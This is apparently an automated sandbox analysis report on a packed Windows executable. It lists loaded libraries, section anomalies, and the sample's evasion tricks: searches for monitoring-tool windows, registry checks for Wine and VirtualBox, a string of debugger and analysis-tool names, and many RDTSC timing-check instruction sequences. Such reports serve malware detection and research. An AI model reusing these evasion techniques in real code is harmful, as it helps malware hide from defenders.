Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeSection loaded: kernel.appcore.dllJump to behavior
Source: lolvgcpX19.exeStatic file information: File size 4502528 > 1048576
Source: lolvgcpX19.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: lolvgcpX19.exeStatic PE information: Raw size of ywbalksd is bigger than: 0x100000 < 0x1bee00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\lolvgcpX19.exeUnpacked PE file: 0.2.lolvgcpX19.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ywbalksd:EW;codissdg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ywbalksd:EW;codissdg:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: lolvgcpX19.exeStatic PE information: real checksum: 0x44e622 should be: 0x45202a
Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: .idata
Source: lolvgcpX19.exeStatic PE information: section name:
Source: lolvgcpX19.exeStatic PE information: section name: ywbalksd
Source: lolvgcpX19.exeStatic PE information: section name: codissdg
Source: lolvgcpX19.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD0CE push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006BE41A push eax; ret 0_3_006BE461
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_3_006CD09F push FFFFFFC9h; retf 0_3_006CD0CD
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_013041D0 push eax; mov dword ptr [esp], edx0_2_013041D5
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_01002340 push eax; mov dword ptr [esp], 00000000h0_2_01002343
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_0103C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0103C743
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FC0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00FC0AC4
Source: C:\Users\user\Desktop\lolvgcpX19.exeCode function: 0_2_00FE1430 push eax; mov dword ptr [esp], 00000000h0_2_00FE1433
Source: lolvgcpX19.exeStatic PE information: section name: ywbalksd entropy: 7.955597758954747

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\lolvgcpX19.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: lolvgcpX19.exe, 00000000.00000003.2157021591.0000000007030000.00000004.00001000.00020000.00000000.sdmp, lolvgcpX19.exe, 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E0C7A second address: 17E0C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F1B99 second address: 17F1BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54832h 0x00000007 jbe 00007F7B98E5482Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7B98E54831h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F2033 second address: 17F2037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F2193 second address: 17F219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F219B second address: 17F219F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F230C second address: 17F231F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007F7B98E54826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F4FE8 second address: 17F501A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2405h], edx 0x0000000f push 00000000h 0x00000011 or edx, dword ptr [ebp+122D3759h] 0x00000017 push 03A9981Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7B99161522h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F501A second address: 17F5020 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F5020 second address: 17F5026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F5026 second address: 17F50B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 03A9989Ch 0x0000000f mov edi, dword ptr [ebp+122D1B31h] 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+122D28CBh], edi 0x0000001d push 00000000h 0x0000001f mov di, 23ABh 0x00000023 mov si, D333h 0x00000027 push 00000003h 0x00000029 push B1D7EF27h 0x0000002e pushad 0x0000002f jmp 00007F7B98E54832h 0x00000034 jmp 00007F7B98E54838h 0x00000039 popad 0x0000003a xor dword ptr [esp], 71D7EF27h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F7B98E54828h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b movsx edx, si 0x0000005e cmc 0x0000005f lea ebx, dword ptr [ebp+12466ED0h] 0x00000065 push edi 0x00000066 mov edi, edx 0x00000068 pop edx 0x00000069 push eax 0x0000006a push edi 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F510B second address: 17F5127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F5127 second address: 17F512B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17F512B second address: 17F5180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F7B99161518h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov di, 64DFh 0x00000027 push 00000000h 0x00000029 cld 0x0000002a push 7FF0BA74h 0x0000002f pushad 0x00000030 pushad 0x00000031 jg 00007F7B99161516h 0x00000037 jmp 00007F7B9916151Ch 0x0000003c popad 0x0000003d jp 00007F7B9916151Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1815F30 second address: 1815F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1815F34 second address: 1815F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1815F38 second address: 1815F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b je 00007F7B98E5483Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F7B98E54826h 0x00000019 jns 00007F7B98E54826h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 181425F second address: 18142B8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7B9916151Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F7B99161527h 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007F7B99161523h 0x00000019 ja 00007F7B99161516h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7B9916151Dh 0x0000002b jnc 00007F7B99161516h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18142B8 second address: 18142BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18142BC second address: 18142D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F7B9916151Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18142D2 second address: 18142E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Ch 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18145FE second address: 181460E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B99161516h 0x00000008 jc 00007F7B99161516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18148A4 second address: 18148BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7B98E54831h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18148BC second address: 18148ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7B99161520h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7B99161526h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1814A3E second address: 1814A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F7B98E54826h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F7B98E54826h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1814A54 second address: 1814A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161527h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007F7B99161516h 0x00000018 jmp 00007F7B99161527h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E277C second address: 17E278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F7B98E5482Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1815107 second address: 181510D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 181594F second address: 1815986 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B98E5482Eh 0x00000008 jno 00007F7B98E5482Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F7B98E5483Bh 0x00000018 jmp 00007F7B98E5482Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1815986 second address: 181598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1819E48 second address: 1819E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7B98E54826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1819E52 second address: 1819E62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F7B99161516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1821B65 second address: 1821B77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007F7B98E54826h 0x00000009 pop edx 0x0000000a jo 00007F7B98E54837h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E7667 second address: 17E7672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7B99161516h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1821307 second address: 1821319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jns 00007F7B98E54826h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182145E second address: 1821462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1821462 second address: 182146C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1821725 second address: 182172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182172B second address: 182172F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 182172F second address: 1821739 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1821739 second address: 182173D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18219FE second address: 1821A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17E7660 second address: 17E7667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 17D361C second address: 17D3653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7B99161528h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f jmp 00007F7B99161523h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18260CE second address: 18260E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E5482Fh 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18267D7 second address: 18267E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18267E5 second address: 18267E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18267E9 second address: 18267F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826864 second address: 18268FD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7B98E54834h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ebx 0x00000015 jnc 00007F7B98E54828h 0x0000001b pop ebx 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnc 00007F7B98E54839h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ebx 0x00000029 jmp 00007F7B98E54836h 0x0000002e pop ebx 0x0000002f pop eax 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F7B98E54828h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D19A4h], eax 0x00000050 push 8AB7FE0Ch 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jnl 00007F7B98E54826h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826A67 second address: 1826A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826A6B second address: 1826A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1826C65 second address: 1826C6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
